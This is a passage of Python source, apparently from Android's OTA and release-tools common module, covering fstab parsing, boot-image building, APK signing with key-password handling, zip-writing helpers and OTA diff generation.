if not 3 <= len(pieces) <= 4:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
options = None
if len(pieces) >= 4:
if pieces[3].startswith("/"):
device2 = pieces[3]
if len(pieces) >= 5:
options = pieces[4]
else:
device2 = None
options = pieces[3]
else:
device2 = None
mount_point = pieces[0]
length = 0
if options:
options = options.split(",")
for i in options:
if i.startswith("length="):
length = int(i[7:])
else:
print("%s: unknown option \"%s\"" % (mount_point, i))
d[mount_point] = Partition(mount_point=mount_point, fs_type=pieces[1],
device=pieces[2], length=length,
device2=device2)
elif fstab_version == 2:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
# <src> <mnt_point> <type> <mnt_flags and options> <fs_mgr_flags>
pieces = line.split()
if len(pieces) != 5:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
# Ignore entries that are managed by vold
options = pieces[4]
if "voldmanaged=" in options:
continue
# It's a good line, parse it
length = 0
options = options.split(",")
for i in options:
if i.startswith("length="):
length = int(i[7:])
else:
# Ignore all unknown options in the unified fstab
continue
mount_flags = pieces[3]
# Honor the SELinux context if present.
context = None
for i in mount_flags.split(","):
if i.startswith("context="):
context = i
mount_point = pieces[1]
d[mount_point] = Partition(mount_point=mount_point, fs_type=pieces[2],
device=pieces[0], length=length,
device2=None, context=context)
else:
raise ValueError("Unknown fstab_version: \"%d\"" % (fstab_version,))
# / is used for the system mount point when the root directory is included in
# system. Other areas assume system is always at "/system" so point /system
# at /.
if system_root_image:
assert not d.has_key("/system") and d.has_key("/")
d["/system"] = d["/"]
return d
def DumpInfoDict(d):
for k, v in sorted(d.items()):
print("%-25s = (%s) %s" % (k, type(v).__name__, v))
def _BuildBootableImage(sourcedir, fs_config_file, info_dict=None,
has_ramdisk=False):
"""Build a bootable image from the specified sourcedir.
Take a kernel, cmdline, and optionally a ramdisk directory from the input (in
'sourcedir'), and turn them into a boot image. Return the image data, or
None if sourcedir does not appear to contains files for building the
requested image."""
def make_ramdisk():
ramdisk_img = tempfile.NamedTemporaryFile()
if os.access(fs_config_file, os.F_OK):
cmd = ["mkbootfs", "-f", fs_config_file,
os.path.join(sourcedir, "RAMDISK")]
else:
cmd = ["mkbootfs", os.path.join(sourcedir, "RAMDISK")]
p1 = Run(cmd, stdout=subprocess.PIPE)
p2 = Run(["minigzip"], stdin=p1.stdout, stdout=ramdisk_img.file.fileno())
p2.wait()
p1.wait()
assert p1.returncode == 0, "mkbootfs of %s ramdisk failed" % (sourcedir,)
assert p2.returncode == 0, "minigzip of %s ramdisk failed" % (sourcedir,)
return ramdisk_img
if not os.access(os.path.join(sourcedir, "kernel"), os.F_OK):
return None
if has_ramdisk and not os.access(os.path.join(sourcedir, "RAMDISK"), os.F_OK):
return None
if info_dict is None:
info_dict = OPTIONS.info_dict
img = tempfile.NamedTemporaryFile()
if has_ramdisk:
ramdisk_img = make_ramdisk()
# use MKBOOTIMG from environ, or "mkbootimg" if empty or not set
mkbootimg = os.getenv('MKBOOTIMG') or "mkbootimg"
cmd = [mkbootimg, "--kernel", os.path.join(sourcedir, "kernel")]
fn = os.path.join(sourcedir, "second")
if os.access(fn, os.F_OK):
cmd.append("--second")
cmd.append(fn)
fn = os.path.join(sourcedir, "cmdline")
if os.access(fn, os.F_OK):
cmd.append("--cmdline")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "base")
if os.access(fn, os.F_OK):
cmd.append("--base")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "pagesize")
if os.access(fn, os.F_OK):
cmd.append("--pagesize")
cmd.append(open(fn).read().rstrip("\n"))
args = info_dict.get("mkbootimg_args", None)
if args and args.strip():
cmd.extend(shlex.split(args))
args = info_dict.get("mkbootimg_version_args", None)
if args and args.strip():
cmd.extend(shlex.split(args))
if has_ramdisk:
cmd.extend(["--ramdisk", ramdisk_img.name])
img_unsigned = None
if info_dict.get("vboot", None):
img_unsigned = tempfile.NamedTemporaryFile()
cmd.extend(["--output", img_unsigned.name])
else:
cmd.extend(["--output", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "mkbootimg of %s image failed" % (
os.path.basename(sourcedir),)
if (info_dict.get("boot_signer", None) == "true" and
info_dict.get("verity_key", None)):
path = "/" + os.path.basename(sourcedir).lower()
cmd = [OPTIONS.boot_signer_path]
cmd.extend(OPTIONS.boot_signer_args)
cmd.extend([path, img.name,
info_dict["verity_key"] + ".pk8",
info_dict["verity_key"] + ".x509.pem", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "boot_signer of %s image failed" % path
# Sign the image if vboot is non-empty.
elif info_dict.get("vboot", None):
path = "/" + os.path.basename(sourcedir).lower()
img_keyblock = tempfile.NamedTemporaryFile()
cmd = [info_dict["vboot_signer_cmd"], info_dict["futility"],
img_unsigned.name, info_dict["vboot_key"] + ".vbpubk",
info_dict["vboot_key"] + ".vbprivk",
info_dict["vboot_subkey"] + ".vbprivk",
img_keyblock.name,
img.name]
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "vboot_signer of %s image failed" % path
# Clean up the temp files.
img_unsigned.close()
img_keyblock.close()
img.seek(os.SEEK_SET, 0)
data = img.read()
if has_ramdisk:
ramdisk_img.close()
img.close()
return data
def GetBootableImage(name, prebuilt_name, unpack_dir, tree_subdir,
info_dict=None):
"""Return a File object with the desired bootable image.
Look for it in 'unpack_dir'/BOOTABLE_IMAGES under the name 'prebuilt_name',
otherwise look for it under 'unpack_dir'/IMAGES, otherwise construct it from
the source files in 'unpack_dir'/'tree_subdir'."""
prebuilt_path = os.path.join(unpack_dir, "BOOTABLE_IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print("using prebuilt %s from BOOTABLE_IMAGES..." % (prebuilt_name,))
return File.FromLocalFile(name, prebuilt_path)
prebuilt_path = os.path.join(unpack_dir, "IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print("using prebuilt %s from IMAGES..." % (prebuilt_name,))
return File.FromLocalFile(name, prebuilt_path)
print("building image from target_files %s..." % (tree_subdir,))
if info_dict is None:
info_dict = OPTIONS.info_dict
# With system_root_image == "true", we don't pack ramdisk into the boot image.
# Unless "recovery_as_boot" is specified, in which case we carry the ramdisk
# for recovery.
has_ramdisk = (info_dict.get("system_root_image") != "true" or
prebuilt_name != "boot.img" or
info_dict.get("recovery_as_boot") == "true")
fs_config = "META/" + tree_subdir.lower() + "_filesystem_config.txt"
data = _BuildBootableImage(os.path.join(unpack_dir, tree_subdir),
os.path.join(unpack_dir, fs_config),
info_dict, has_ramdisk)
if data:
return File(name, data)
return None
def UnzipTemp(filename, pattern=None):
"""Unzip the given archive into a temporary directory and return the name.
If filename is of the form "foo.zip+bar.zip", unzip foo.zip into a
temp dir, then unzip bar.zip into that_dir/BOOTABLE_IMAGES.
Returns (tempdir, zipobj) where zipobj is a zipfile.ZipFile (of the
main file), open for reading.
"""
tmp = tempfile.mkdtemp(prefix="targetfiles-")
OPTIONS.tempfiles.append(tmp)
def unzip_to_dir(filename, dirname):
cmd = ["unzip", "-o", "-q", filename, "-d", dirname]
if pattern is not None:
cmd.extend(pattern)
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
if p.returncode != 0:
raise ExternalError("failed to unzip input target-files \"%s\"" %
(filename,))
m = re.match(r"^(.*[.]zip)\+(.*[.]zip)$", filename, re.IGNORECASE)
if m:
unzip_to_dir(m.group(1), tmp)
unzip_to_dir(m.group(2), os.path.join(tmp, "BOOTABLE_IMAGES"))
filename = m.group(1)
else:
unzip_to_dir(filename, tmp)
return tmp, zipfile.ZipFile(filename, "r")
def GetKeyPasswords(keylist):
"""Given a list of keys, prompt the user to enter passwords for
those which require them. Return a {key: password} dict. password
will be None if the key has no password."""
no_passwords = []
need_passwords = []
key_passwords = {}
devnull = open("/dev/null", "w+b")
for k in sorted(keylist):
# We don't need a password for things that aren't really keys.
if k in SPECIAL_CERT_STRINGS:
no_passwords.append(k)
continue
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-nocrypt"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.STDOUT)
p.communicate()
if p.returncode == 0:
# Definitely an unencrypted key.
no_passwords.append(k)
else:
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-passin", "pass:"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.PIPE)
_, stderr = p.communicate()
if p.returncode == 0:
# Encrypted key with empty string as password.
key_passwords[k] = ''
elif stderr.startswith('Error decrypting key'):
# Definitely encrypted key.
# It would have said "Error reading key" if it didn't parse correctly.
need_passwords.append(k)
else:
# Potentially, a type of key that openssl doesn't understand.
# We'll let the routines in signapk.jar handle it.
no_passwords.append(k)
devnull.close()
key_passwords.update(PasswordManager().GetPasswords(need_passwords))
key_passwords.update(dict.fromkeys(no_passwords, None))
return key_passwords
def GetMinSdkVersion(apk_name):
"""Get the minSdkVersion delared in the APK. This can be both a decimal number
(API Level) or a codename.
"""
p = Run(["aapt", "dump", "badging", apk_name], stdout=subprocess.PIPE)
output, err = p.communicate()
if err:
raise ExternalError("Failed to obtain minSdkVersion: aapt return code %s"
% (p.returncode,))
for line in output.split("\n"):
# Looking for lines such as sdkVersion:'23' or sdkVersion:'M'
m = re.match(r'sdkVersion:\'([^\']*)\'', line)
if m:
return m.group(1)
raise ExternalError("No minSdkVersion returned by aapt")
def GetMinSdkVersionInt(apk_name, codename_to_api_level_map):
"""Get the minSdkVersion declared in the APK as a number (API Level). If
minSdkVersion is set to a codename, it is translated to a number using the
provided map.
"""
version = GetMinSdkVersion(apk_name)
try:
return int(version)
except ValueError:
# Not a decimal number. Codename?
if version in codename_to_api_level_map:
return codename_to_api_level_map[version]
else:
raise ExternalError("Unknown minSdkVersion: '%s'. Known codenames: %s"
% (version, codename_to_api_level_map))
def SignFile(input_name, output_name, key, password, min_api_level=None,
codename_to_api_level_map=dict(),
whole_file=False):
"""Sign the input_name zip/jar/apk, producing output_name. Use the
given key and password (the latter may be None if the key does not
have a password.
If whole_file is true, use the "-w" option to SignApk to embed a
signature that covers the whole file in the archive comment of the
zip file.
min_api_level is the API Level (int) of the oldest platform this file may end
up on. If not specified for an APK, the API Level is obtained by interpreting
the minSdkVersion attribute of the APK's AndroidManifest.xml.
codename_to_api_level_map is needed to translate the codename which may be
encountered as the APK's minSdkVersion.
"""
java_library_path = os.path.join(
OPTIONS.search_path, OPTIONS.signapk_shared_library_path)
cmd = [OPTIONS.java_path, OPTIONS.java_args,
"-Djava.library.path=" + java_library_path,
"-jar",
os.path.join(OPTIONS.search_path, OPTIONS.signapk_path)]
cmd.extend(OPTIONS.extra_signapk_args)
if whole_file:
cmd.append("-w")
min_sdk_version = min_api_level
if min_sdk_version is None:
if not whole_file:
min_sdk_version = GetMinSdkVersionInt(
input_name, codename_to_api_level_map)
if min_sdk_version is not None:
cmd.extend(["--min-sdk-version", str(min_sdk_version)])
cmd.extend([key + OPTIONS.public_key_suffix,
key + OPTIONS.private_key_suffix,
input_name, output_name])
p = Run(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if password is not None:
password += "\n"
p.communicate(password)
if p.returncode != 0:
raise ExternalError("signapk.jar failed: return code %s" % (p.returncode,))
def CheckSize(data, target, info_dict):
"""Check the data string passed against the max size limit, if
any, for the given target. Raise exception if the data is too big.
Print a warning if the data is nearing the maximum size."""
if target.endswith(".img"):
target = target[:-4]
mount_point = "/" + target
fs_type = None
limit = None
if info_dict["fstab"]:
if mount_point == "/userdata":
mount_point = "/data"
p = info_dict["fstab"][mount_point]
fs_type = p.fs_type
device = p.device
if "/" in device:
device = device[device.rfind("/")+1:]
limit = info_dict.get(device + "_size", None)
if not fs_type or not limit:
return
if fs_type == "yaffs2":
# image size should be increased by 1/64th to account for the
# spare area (64 bytes per 2k page)
limit = limit / 2048 * (2048+64)
size = len(data)
pct = float(size) * 100.0 / limit
msg = "%s size (%d) is %.2f%% of limit (%d)" % (target, size, pct, limit)
if pct >= 99.0:
raise ExternalError(msg)
elif pct >= 95.0:
print("\n WARNING: %s\n" % (msg,))
elif OPTIONS.verbose:
print(" ", msg)
def ReadApkCerts(tf_zip):
"""Given a target_files ZipFile, parse the META/apkcerts.txt file
and return a {package: cert} dict."""
certmap = {}
for line in tf_zip.read("META/apkcerts.txt").split("\n"):
line = line.strip()
if not line:
continue
m = re.match(r'^name="(.*)"\s+certificate="(.*)"\s+'
r'private_key="(.*)"$', line)
if m:
name, cert, privkey = m.groups()
public_key_suffix_len = len(OPTIONS.public_key_suffix)
private_key_suffix_len = len(OPTIONS.private_key_suffix)
if cert in SPECIAL_CERT_STRINGS and not privkey:
certmap[name] = cert
elif (cert.endswith(OPTIONS.public_key_suffix) and
privkey.endswith(OPTIONS.private_key_suffix) and
cert[:-public_key_suffix_len] == privkey[:-private_key_suffix_len]):
certmap[name] = cert[:-public_key_suffix_len]
else:
raise ValueError("failed to parse line from apkcerts.txt:\n" + line)
return certmap
COMMON_DOCSTRING = """
-p (--path) <dir>
Prepend <dir>/bin to the list of places to search for binaries
run by this script, and expect to find jars in <dir>/framework.
-s (--device_specific) <file>
Path to the python module containing device-specific
releasetools code.
-x (--extra) <key=value>
Add a key/value pair to the 'extras' dict, which device-specific
extension code may look at.
-v (--verbose)
Show command lines being executed.
-h (--help)
Display this usage message and exit.
"""
def Usage(docstring):
print(docstring.rstrip("\n"))
print(COMMON_DOCSTRING)
def ParseOptions(argv,
docstring,
extra_opts="", extra_long_opts=(),
extra_option_handler=None):
"""Parse the options in argv and return any arguments that aren't
flags. docstring is the calling module's docstring, to be displayed
for errors and -h. extra_opts and extra_long_opts are for flags
defined by the caller, which are processed by passing them to
extra_option_handler."""
try:
opts, args = getopt.getopt(
argv, "hvp:s:x:" + extra_opts,
["help", "verbose", "path=", "signapk_path=",
"signapk_shared_library_path=", "extra_signapk_args=",
"java_path=", "java_args=", "public_key_suffix=",
"private_key_suffix=", "boot_signer_path=", "boot_signer_args=",
"verity_signer_path=", "verity_signer_args=", "device_specific=",
"extra="] +
list(extra_long_opts))
except getopt.GetoptError as err:
Usage(docstring)
print("**", str(err), "**")
sys.exit(2)
for o, a in opts:
if o in ("-h", "--help"):
Usage(docstring)
sys.exit()
elif o in ("-v", "--verbose"):
OPTIONS.verbose = True
elif o in ("-p", "--path"):
OPTIONS.search_path = a
elif o in ("--signapk_path",):
OPTIONS.signapk_path = a
elif o in ("--signapk_shared_library_path",):
OPTIONS.signapk_shared_library_path = a
elif o in ("--extra_signapk_args",):
OPTIONS.extra_signapk_args = shlex.split(a)
elif o in ("--java_path",):
OPTIONS.java_path = a
elif o in ("--java_args",):
OPTIONS.java_args = shlex.split(a)
elif o in ("--public_key_suffix",):
OPTIONS.public_key_suffix = a
elif o in ("--private_key_suffix",):
OPTIONS.private_key_suffix = a
elif o in ("--boot_signer_path",):
OPTIONS.boot_signer_path = a
elif o in ("--boot_signer_args",):
OPTIONS.boot_signer_args = shlex.split(a)
elif o in ("--verity_signer_path",):
OPTIONS.verity_signer_path = a
elif o in ("--verity_signer_args",):
OPTIONS.verity_signer_args = shlex.split(a)
elif o in ("-s", "--device_specific"):
OPTIONS.device_specific = a
elif o in ("-x", "--extra"):
key, value = a.split("=", 1)
OPTIONS.extras[key] = value
else:
if extra_option_handler is None or not extra_option_handler(o, a):
assert False, "unknown option \"%s\"" % (o,)
if OPTIONS.search_path:
os.environ["PATH"] = (os.path.join(OPTIONS.search_path, "bin") +
os.pathsep + os.environ["PATH"])
return args
def MakeTempFile(prefix=None, suffix=None):
"""Make a temp file and add it to the list of things to be deleted
when Cleanup() is called. Return the filename."""
fd, fn = tempfile.mkstemp(prefix=prefix, suffix=suffix)
os.close(fd)
OPTIONS.tempfiles.append(fn)
return fn
def Cleanup():
for i in OPTIONS.tempfiles:
if os.path.isdir(i):
shutil.rmtree(i)
else:
os.remove(i)
class PasswordManager(object):
def __init__(self):
self.editor = os.getenv("EDITOR", None)
self.pwfile = os.getenv("ANDROID_PW_FILE", None)
def GetPasswords(self, items):
"""Get passwords corresponding to each string in 'items',
returning a dict. (The dict may have keys in addition to the
values in 'items'.)
Uses the passwords in $ANDROID_PW_FILE if available, letting the
user edit that file to add more needed passwords. If no editor is
available, or $ANDROID_PW_FILE isn't define, prompts the user
interactively in the ordinary way.
"""
current = self.ReadFile()
first = True
while True:
missing = []
for i in items:
if i not in current or not current[i]:
missing.append(i)
# Are all the passwords already in the file?
if not missing:
return current
for i in missing:
current[i] = ""
if not first:
print("key file %s still missing some passwords." % (self.pwfile,))
answer = raw_input("try to edit again? [y]> ").strip()
if answer and answer[0] not in 'yY':
raise RuntimeError("key passwords unavailable")
first = False
current = self.UpdateAndReadFile(current)
def PromptResult(self, current): # pylint: disable=no-self-use
"""Prompt the user to enter a value (password) for each key in
'current' whose value is fales. Returns a new dict with all the
values.
"""
result = {}
for k, v in sorted(current.iteritems()):
if v:
result[k] = v
else:
while True:
result[k] = getpass.getpass(
"Enter password for %s key> " % k).strip()
if result[k]:
break
return result
def UpdateAndReadFile(self, current):
if not self.editor or not self.pwfile:
return self.PromptResult(current)
f = open(self.pwfile, "w")
os.chmod(self.pwfile, 0o600)
f.write("# Enter key passwords between the [[[ ]]] brackets.\n")
f.write("# (Additional spaces are harmless.)\n\n")
first_line = None
sorted_list = sorted([(not v, k, v) for (k, v) in current.iteritems()])
for i, (_, k, v) in enumerate(sorted_list):
f.write("[[[ %s ]]] %s\n" % (v, k))
if not v and first_line is None:
# position cursor on first line with no password.
first_line = i + 4
f.close()
p = Run([self.editor, "+%d" % (first_line,), self.pwfile])
_, _ = p.communicate()
return self.ReadFile()
def ReadFile(self):
result = {}
if self.pwfile is None:
return result
try:
f = open(self.pwfile, "r")
for line in f:
line = line.strip()
if not line or line[0] == '#':
continue
m = re.match(r"^\[\[\[\s*(.*?)\s*\]\]\]\s*(\S+)$", line)
if not m:
print("failed to parse password file: ", line)
else:
result[m.group(2)] = m.group(1)
f.close()
except IOError as e:
if e.errno != errno.ENOENT:
print("error reading password file: ", str(e))
return result
def ZipWrite(zip_file, filename, arcname=None, perms=0o644,
compress_type=None):
import datetime
# http://b/18015246
# Python 2.7's zipfile implementation wrongly thinks that zip64 is required
# for files larger than 2GiB. We can work around this by adjusting their
# limit. Note that `zipfile.writestr()` will not work for strings larger than
# 2GiB. The Python interpreter sometimes rejects strings that large (though
# it isn't clear to me exactly what circumstances cause this).
# `zipfile.write()` must be used directly to work around this.
#
# This mess can be avoided if we port to python3.
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
if compress_type is None:
compress_type = zip_file.compression
if arcname is None:
arcname = filename
saved_stat = os.stat(filename)
try:
# `zipfile.write()` doesn't allow us to pass ZipInfo, so just modify the
# file to be zipped and reset it when we're done.
os.chmod(filename, perms)
# Use a fixed timestamp so the output is repeatable.
epoch = datetime.datetime.fromtimestamp(0)
timestamp = (datetime.datetime(2009, 1, 1) - epoch).total_seconds()
os.utime(filename, (timestamp, timestamp))
zip_file.write(filename, arcname=arcname, compress_type=compress_type)
finally:
os.chmod(filename, saved_stat.st_mode)
os.utime(filename, (saved_stat.st_atime, saved_stat.st_mtime))
zipfile.ZIP64_LIMIT = saved_zip64_limit
def ZipWriteStr(zip_file, zinfo_or_arcname, data, perms=None,
compress_type=None):
"""Wrap zipfile.writestr() function to work around the zip64 limit.
Even with the ZIP64_LIMIT workaround, it won't allow writing a string
longer than 2GiB. It gives 'OverflowError: size does not fit in an int'
when calling crc32(bytes).
But it still works fine to write a shorter string into a large zip file.
We should use ZipWrite() whenever possible, and only use ZipWriteStr()
when we know the string won't be too long.
"""
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
if not isinstance(zinfo_or_arcname, zipfile.ZipInfo):
zinfo = zipfile.ZipInfo(filename=zinfo_or_arcname)
zinfo.compress_type = zip_file.compression
if perms is None:
perms = 0o100644
else:
zinfo = zinfo_or_arcname
# If compress_type is given, it overrides the value in zinfo.
if compress_type is not None:
zinfo.compress_type = compress_type
# If perms is given, it has a priority.
if perms is not None:
# If perms doesn't set the file type, mark it as a regular file.
if perms & 0o770000 == 0:
perms |= 0o100000
zinfo.external_attr = perms << 16
# Use a fixed timestamp so the output is repeatable.
zinfo.date_time = (2009, 1, 1, 0, 0, 0)
zip_file.writestr(zinfo, data)
zipfile.ZIP64_LIMIT = saved_zip64_limit
def ZipClose(zip_file):
# http://b/18015246
# zipfile also refers to ZIP64_LIMIT during close() when it writes out the
# central directory.
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
zip_file.close()
zipfile.ZIP64_LIMIT = saved_zip64_limit
class DeviceSpecificParams(object):
module = None
def __init__(self, **kwargs):
"""Keyword arguments to the constructor become attributes of this
object, which is passed to all functions in the device-specific
module."""
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.extras = OPTIONS.extras
if self.module is None:
path = OPTIONS.device_specific
if not path:
return
try:
if os.path.isdir(path):
info = imp.find_module("releasetools", [path])
else:
d, f = os.path.split(path)
b, x = os.path.splitext(f)
if x == ".py":
f = b
info = imp.find_module(f, [d])
print("loaded device-specific extensions from", path)
self.module = imp.load_module("device_specific", *info)
except ImportError:
print("unable to load device-specific module; assuming none")
def _DoCall(self, function_name, *args, **kwargs):
"""Call the named function in the device-specific module, passing
the given args and kwargs. The first argument to the call will be
the DeviceSpecific object itself. If there is no module, or the
module does not define the function, return the value of the
'default' kwarg (which itself defaults to None)."""
if self.module is None or not hasattr(self.module, function_name):
return kwargs.get("default", None)
return getattr(self.module, function_name)(*((self,) + args), **kwargs)
def FullOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of a
full OTA package. Implementations can add whatever additional
assertions they like."""
return self._DoCall("FullOTA_Assertions")
def FullOTA_InstallBegin(self):
"""Called at the start of full OTA installation."""
return self._DoCall("FullOTA_InstallBegin")
def FullOTA_InstallEnd(self):
"""Called at the end of full OTA installation; typically this is
used to install the image for the device's baseband processor."""
return self._DoCall("FullOTA_InstallEnd")
def IncrementalOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of an
incremental OTA package. Implementations can add whatever
additional assertions they like."""
return self._DoCall("IncrementalOTA_Assertions")
def IncrementalOTA_VerifyBegin(self):
"""Called at the start of the verification phase of incremental
OTA installation; additional checks can be placed here to abort
the script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyBegin")
def IncrementalOTA_VerifyEnd(self):
"""Called at the end of the verification phase of incremental OTA
installation; additional checks can be placed here to abort the
script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyEnd")
def IncrementalOTA_InstallBegin(self):
"""Called at the start of incremental OTA installation (after
verification is complete)."""
return self._DoCall("IncrementalOTA_InstallBegin")
def IncrementalOTA_InstallEnd(self):
"""Called at the end of incremental OTA installation; typically
this is used to install the image for the device's baseband
processor."""
return self._DoCall("IncrementalOTA_InstallEnd")
def VerifyOTA_Assertions(self):
return self._DoCall("VerifyOTA_Assertions")
class File(object):
def __init__(self, name, data):
self.name = name
self.data = data
self.size = len(data)
self.sha1 = sha1(data).hexdigest()
@classmethod
def FromLocalFile(cls, name, diskname):
f = open(diskname, "rb")
data = f.read()
f.close()
return File(name, data)
def WriteToTemp(self):
t = tempfile.NamedTemporaryFile()
t.write(self.data)
t.flush()
return t
def AddToZip(self, z, compression=None):
ZipWriteStr(z, self.name, self.data, compress_type=compression)
DIFF_PROGRAM_BY_EXT = {
".gz" : "imgdiff",
".zip" : ["imgdiff", "-z"],
".jar" : ["imgdiff", "-z"],
".apk" : ["imgdiff", "-z"],
".img" : "imgdiff",
}
class Difference(object):
def __init__(self, tf, sf, diff_program=None):
self.tf = tf
self.sf = sf
self.patch = None
self.diff_program = diff_program
def ComputePatch(self):
"""Compute the patch (as a string of data) needed to turn sf into
tf. Returns the same tuple as GetPatch()."""
tf = self.tf
sf = self.sf
if self.diff_program:
diff_program = self.diff_program
else:
ext = os.path.splitext(tf.name)[1]
diff_program = DIFF_PROGRAM_BY_EXT.get(ext, "bsdiff")
ttemp = tf.WriteToTemp()
stemp = sf.WriteToTemp()
ext = os.path.splitext(tf.name)[1]
try:
ptemp = tempfile.NamedTemporaryFile()
if isinstance(diff_program, list):
cmd = copy.copy(diff_program)
else:
cmd = [diff_program]
cmd.append(stemp.name)
cmd.append(ttemp.name)
cmd.append(ptemp.name)
p = Run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
err = []
def run():
_, e = p.communicate()
if e:
err.append(e)
th = threading.Thread(target=run)
th.start()
th.join(timeout=300) # 5 mins
if th.is_alive():
print("WARNING: diff command timed out")
p.terminate()
th.join(5)
if th.is_alive():
p.kill()
th.join()
if err or p.returncode != 0:
print("WARNING: failure running %s:\n%s\n" % (
diff_program, "".join(err)))
self.patch = None
return None, None, None
diff = ptemp.read()
finally:
ptemp.close()
stemp.close()
ttemp.close()
self.patch = diff
return self.tf, self.sf, self.patch
def GetPatch(self):
"""Return a tuple (target_file, source_file, patch_data).
patch_data may be None if ComputePatch hasn't been called, or if
computing the patch failed."""
return self.tf, self.sf, self.patch
def ComputeDifferences(diffs):
"""Call ComputePatch on all the Difference objects in 'diffs'."""
print(len(diffs), "diffs to compute")
# Do the largest files first, to try and reduce the long-pole effect.
by_size = [(i.tf.size, i) for i in diffs]
by_size.sort(reverse=True)
by_size = [i[1] for i in by_size]
lock = threading.Lock()
diff_iter = iter(by_size) # accessed under lock
def worker():
try:
lock.acquire()
for d in diff_iter:
lock.release()
start = time.time()
d.ComputePatch()
dur = time.time() - start
lock.acquire()
tf, sf, patch = d.GetPatch()
if sf.name == tf.name:
name = tf.name
else:
name = "%s (%s)" % (tf.name, sf.name)
if patch is None:
print("patching failed! %s" % (name,))
else:
print("%8.2f sec %8d / %8d bytes (%6.2f%%) %s" % (
dur, len(patch), tf.size, 100.0 * len(patch) / tf.size, name))
lock.release()
except Exception as e:
print(e)
raise
# start worker threads; wait for them all to finish.
threads = [threading.Thread(target=worker)
for i in range(OPTIONS.worker_threads)]
for th in threads:
th.start()
while threads:
threads.pop().join()
class BlockDifference(object):
def __init__(self, partition, tgt, src=None, check_first_block=False,
version=None, disable_imgdiff=False):
self.tgt = tgt
self.src = src
self.partition = partition
self.check_first_block = check_first_block
self.disable_imgdiff = disable_imgdiff
if version is None:
version = 1
if OPTIONS.info_dict:
version = max(
int(i) for i in
OPTIONS.info_dict.get("blockimgdiff_versions", "1").split(","))
self.version = version
b = blockimgdiff.BlockImageDiff(tgt, src, threads=OPTIONS.worker_threads,
version=self.version,
disable_imgdiff=self.disable_imgdiff)
tmpdir = tempfile.mkdtemp()
OPTIONS.tempfiles.append(tmpdir)
self.path = os.path.join(tmpdir, partition)
b.Compute(self.path)
self._required_cache = b.max_stashed_size
self.touched_src_ranges = b.touched_src_ranges
self.touched_src_sha1 = b.touched_src_sha1
@property
def required_cache(self):
return self._required_cache
def WriteScript(self, script, output_zip, progress=None):
if not self.src:
# write the output unconditionally
script.Print("Patching %s image unconditionally..." % (self.partition,))
else:
script.Print("Patching %s image after verification." % (self.partition,))
if progress:
script.ShowProgress(progress, 0)
self._WriteUpdate(script, output_zip)
if OPTIONS.verify:
self._WritePostInstallVerifyScript(script)
def WriteStrictVerifyScript(self, script):
"""Verify all the blocks in the care_map, including clobbered blocks.
This differs from the WriteVerifyScript() function: a) it prints different
error messages; b) it doesn't allow half-way updated images to pass the
verification."""
partition = self.partition
script.Print("Verifying %s..." % (partition,))
ranges = self.tgt.care_map
ranges_str = ranges.to_string_raw()
script.AppendExtra('range_sha1("%s", "%s") == "%s" && '
'ui_print(" Verified.") || '
'ui_print("\\"%s\\" has unexpected contents.");' % (
self.device, ranges_str,
self.tgt.TotalSha1(include_clobbered_blocks=True),
self.device))
script.AppendExtra("")
def WriteVerifyScript(self, script, touched_blocks_only=False):
partition = self.partition
# full OTA
if not self.src:
script.Print("Image %s will be patched unconditionally." % (partition,))
# incremental OTA
else:
if touched_blocks_only and self.version >= 3:
ranges = self.touched_src_ranges
expected_sha1 = self.touched_src_sha1
else:
ranges = self.src.care_map.subtract(self.src.clobbered_blocks)
expected_sha1 = self.src.TotalSha1()
# No blocks to be checked, skipping.
if not ranges:
return
ranges_str = ranges.to_string_raw()
if self.version >= 4:
script.AppendExtra(('if (range_sha1("%s", "%s") == "%s" || '
'block_image_verify("%s", '
'package_extract_file("%s.transfer.list"), '
'"%s.new.dat", "%s.patch.dat")) then') % (
self.device, ranges_str, expected_sha1,
self.device, partition, partition, partition))
elif self.version == 3:
script.AppendExtra(('if (range_sha1("%s", "%s") == "%s" || '
'block_image_verify("%s", '
'package_extract_file("%s.transfer.list"), '
'"%s.new.dat", "%s.patch.dat")) then') % (
self.device, ranges_str, expected_sha1,
self.device, partition, partition, partition))
else:
script.AppendExtra('if range_sha1("%s", "%s") == "%s" then' % (
self.device, ranges_str, self.src.TotalSha1()))
script.Print('Verified %s image...' % (partition,))
script.AppendExtra('else')
if self.version >= 4:
# Bug: 21124327
# When generating incrementals for the system and vendor partitions in
# version 4 or newer, explicitly check the first block (which contains
# the superblock) of the partition to see if it's what we expect. If
# this check fails, give an explicit log message about the partition
# having been remounted R/W (the most likely explanation).
if self.check_first_block:
script.AppendExtra('check_first_block("%s");' % (self.device,))
# If version >= 4, try block recovery before abort update
if partition == "system":
code = ErrorCode.SYSTEM_RECOVER_FAILURE
else:
code = ErrorCode.VENDOR_RECOVER_FAILURE
